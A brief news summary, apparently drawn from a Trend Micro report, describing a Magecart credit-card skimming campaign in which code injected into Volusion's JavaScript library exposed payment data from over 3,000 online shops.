FIN6 Compromised E-commerce Platform via Magecart to Inject Credit Card Skimmers Into Thousands of Online Shops

trend Micro discovered that the online credit card skimming attack known as Magecart or E-Skimming was actively operating on 3,126 online shops. Our data shows that the attack started on September 7, 2019. All of the impacted online shops are hosted on the cloud platform of the e-commerce service provider “Volusion,” one of the top e-commerce platforms in the market. This is actually the third time we have identified a card skimmer injected into the cloud platform of an e-commerce provider. Two other businesses were already victimized this year: a campus e-commerce platform and a hotel e-commerce platform. These targets are obviously appealing to cybercriminals since they are connected to multiple — in this most recent case, thousands of — online shops.

We found malicious code injected into a JavaScript library provided by Volusion to their client shops. The injected code loaded another JavaScript stored on a Google Storage service. The loaded script is almost a direct copy of a normal JavaScript library but has a credit card skimmer carefully integrated. When customers submit their payment information, the skimmer will copy and send the personal information and credit card details to an exfiltration server belonging to the attackers.

Read more…
Source: Trend Micro